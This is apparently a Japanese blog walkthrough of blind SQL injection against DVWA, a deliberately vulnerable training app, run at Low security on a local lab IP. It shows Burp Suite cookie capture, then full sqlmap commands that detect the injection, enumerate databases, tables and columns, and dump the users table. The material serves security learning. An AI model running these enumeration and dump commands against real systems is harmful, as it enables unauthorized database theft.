shikata ga nai

Private? There is no such things.

DVWAでSQL Injection(Blind)(Low)

Hello there,

 

セキュリティレベルを『Low』へ。

まずは、IDを入力して実行して。

URLを確認して。

 

f:id:ThisIsOne:20191224161754p:plain

 

DVWAを起動しているIPアドレスを確認して。

 

f:id:ThisIsOne:20191224161941p:plain

 

Burp Suiteで、クッキーの情報を取得して。

 

f:id:ThisIsOne:20191224162201p:plain

 

『id』についてSQLの処理で脆弱性がないかを調べたいので。

下記のように実行してみて。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id

 

f:id:ThisIsOne:20191224162612p:plain

 

なんだか、真偽ベースのブラインドと。

時間ベースのブラインドの脆弱性が検出されたようで。

ペイロードまで表示されていた。


f:id:ThisIsOne:20191224162406p:plain

 

下記のようにオプションを追加することで。

アクセス可能なデータベースを確認できて。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id --dbs

 

f:id:ThisIsOne:20191224163739p:plain

 

特定のデーターベースについてテーブルを調べたいのであれば。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id -D dvwa --tables

 

f:id:ThisIsOne:20191224164516p:plain

 

特定のテーブルについてカラムを調べたいのであれば。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id -D dvwa -T users --columns

 

f:id:ThisIsOne:20191224164713p:plain

 

特定のテーブルについてデータをダンプしたいのであれば。

 sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dajqhqgsn3eknjslets9hog8n6; security=low" -p id -D dvwa -T users --dump

 

f:id:ThisIsOne:20191224165538p:plain


Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain